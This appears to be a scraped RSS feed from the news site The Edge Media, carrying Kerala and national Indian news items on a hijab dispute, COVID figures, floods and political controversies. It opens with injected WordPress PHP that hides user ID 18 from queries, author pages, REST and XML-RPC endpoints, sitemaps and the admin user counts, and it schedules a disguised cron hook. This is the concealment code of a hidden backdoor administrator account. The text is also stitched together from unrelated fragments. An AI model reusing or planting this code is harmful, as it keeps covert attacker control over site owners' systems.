add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Kerala Government Offers Support to Hijab-Barred Student Seeking Admission Elsewhere appeared first on The Edge Media.
]]>The announcement follows a statement by the student’s father, who said he no longer intends to send his daughter back to the institution following the controversy.
“If the student wishes to continue her education elsewhere and approaches us, we will act immediately to facilitate her admission through a special government order,” Minister Sivankutty said while speaking to the media in Thiruvananthapuram.
He emphasized that in Kerala’s inclusive educational culture, no student should be deprived of learning opportunities due to issues like school policies or dress codes. He added that the stress caused to the student by this incident is regrettable, holding the school management accountable for her emotional distress.
The student, currently in Class VIII, has expressed her reluctance to return to the school, according to her father. “She’s been under immense pressure since the incident. We’ve decided to respect her decision not to go back,” he said, also confirming that they’ve begun seeking admission in other schools.
Meanwhile, the Indian Union Muslim League (IUML), a prominent ally of the opposition United Democratic Front (UDF), has extended support to the minister’s stand. IUML National General Secretary P K Kunhalikutty condemned the school’s actions, labeling them as a display of extreme intolerance.
“This is a distressing situation that shouldn’t occur in a progressive state like Kerala,”Kunhalikutty said during a press interaction in Malappuram. He claimed that certain elements in society may be fueling tensions, which is why the IUML initially refrained from intervening.
The school’s stance on the hijab was criticized as being deeply insensitive, with the party accusing the institution of promoting an intolerant narrative through its public statements.
The dispute began when the school objected to the student wearing a hijab, citing its dress code. The disagreement quickly escalated, drawing public and political attention. On October 10, the student’s parents visited the school to challenge its decision, prompting the management to declare a two-day closure.
The Kerala High Court has since ordered police protection for the school amid rising tensions. Minister Sivankutty has continued to stand by the student’s right to religious expression and access to education, affirming the government’s commitment to intervene when necessary.
The post Kerala Government Offers Support to Hijab-Barred Student Seeking Admission Elsewhere appeared first on The Edge Media.
]]>The post Modi Asked Non-BJP Ruled States To Reduce Fuel VAT appeared first on The Edge Media.
]]>The Prime Minister stated that a proposal to cut VAT was made in November, but states like Maharashtra, West Bengal, Telangana, Andhra Pradesh, Tamil Nadu, Kerala, and Jharkhand “for some reason” did not comply.
The post Modi Asked Non-BJP Ruled States To Reduce Fuel VAT appeared first on The Edge Media.
]]>The post Central Trade Unions Calls For Bharat Bandh For Two Days, Day 1 Saw Effects appeared first on The Edge Media.
]]>The post Central Trade Unions Calls For Bharat Bandh For Two Days, Day 1 Saw Effects appeared first on The Edge Media.
]]>The post Heavy rains pound Kerala, raising flood levels in different dams and submerging several highways appeared first on The Edge Media.
]]>
According to the Tamil Nadu government, the water level in the Mullaperiyar dam surpassed 140 feet on Sunday morning, according to the Idukki district administration. As an outcome, residents on both banks of the Periyar should be particularly cautious, as the dam’s shutters could be opened in the next 24 hours if the water level rises higher, posing a risk of excess water overflowing, according to the report.
The post Heavy rains pound Kerala, raising flood levels in different dams and submerging several highways appeared first on The Edge Media.
]]>The post Norovirus cases confirmed in Kerala’s Wayanad and the government is urging residents to be cautious appeared first on The Edge Media.
]]>
Even though the situation has been brought under control and no further spread has been detected, health officials stated they are establishing a data bank of veterinary science college students as well as hosting an awareness workshop as part of preventive measures.
The post Norovirus cases confirmed in Kerala’s Wayanad and the government is urging residents to be cautious appeared first on The Edge Media.
]]>The post Kerala announces 7,427 new cases and 62 deaths today, bringing India’s vaccine coverage to 106 crore doses appeared first on The Edge Media.
]]>
India reported 13,198 recoveries as of Friday, compared to 14,348 new cases. If this trend continues over the following few weeks, it could signal the start of a new pandemic wave in the country.
The post Kerala announces 7,427 new cases and 62 deaths today, bringing India’s vaccine coverage to 106 crore doses appeared first on The Edge Media.
]]>The post India reports 14,306 fresh Covid Cases; Kerala highest contributor appeared first on The Edge Media.
]]>
The country’s active caseload has dropped to 167,695, the lowest in 239 days, and accounts for fewer than 1% of overall infections, according to the health ministry.
The recovery rate in the country has risen to 98.18 percent, the highest level since the outbreak began. According to the health ministry, the weekly positivity rate was 1.24 percent and the daily positivity rate was 1.43 percent.
The post India reports 14,306 fresh Covid Cases; Kerala highest contributor appeared first on The Edge Media.
]]>The post Rahul Gandhi is in Kerala for a two-day visit amid rumors of infighting within the state Congress organization appeared first on The Edge Media.
]]>Rahul Gandhi, the Congress’s national leader, arrived in Kerala on Wednesday for a two-day visit, despite mounting dissent within the party’s state unit. Gandhi will visit his parliamentary seat of Wayanad today, according to sources acquainted with the situation, and his visit is likely geared at putting out the fire within the Kerala Pradesh Congress unit.
The former Congress president was photographed arriving at the Calicut airport in Karipur this morning, from where he will travel to Kozhikode and Malappuram later in the day, according to photos released by the ANI news agency.
The post Rahul Gandhi is in Kerala for a two-day visit amid rumors of infighting within the state Congress organization appeared first on The Edge Media.
]]>The post Nuns in Kerala staging a walkout in protest of a priest’s anti-Muslim remarks appeared first on The Edge Media.
]]>
While Pala Bishop Joseph Kallarangatt’s remark about “narcotic jihad” is causing controversy in Kerala, four nuns from Kuravilangad in Kottayam have accused another Christian priest of delivering a hate speech against Muslims. The nuns protested by walking out of the prayer service.
The nuns, in particular, are those who had previously stepped out in the open to denounce Bishop Franco Mulakkal, who is accused of rape. The sisters accused Rajeev, a priest from the Third Order Regular of Saint Francis of Penance, of giving a hate speech against Muslims during a prayer service at a chapel within the St Francis Mission house in Kuravilangad on Sunday, September 13.
The post Nuns in Kerala staging a walkout in protest of a priest’s anti-Muslim remarks appeared first on The Edge Media.
]]>The post The political backlash over the remark about “narcotic jihad” intensifies; the Pala Diocese responds appeared first on The Edge Media.
]]>In the face of rising criticism, the Pala Diocese, which is affiliated with the influential Syro-Malabar Church, issued a statement claiming that the bishop had no intention of harming anyone and that his words were not directed at any particular population.
The post The political backlash over the remark about “narcotic jihad” intensifies; the Pala Diocese responds appeared first on The Edge Media.
]]>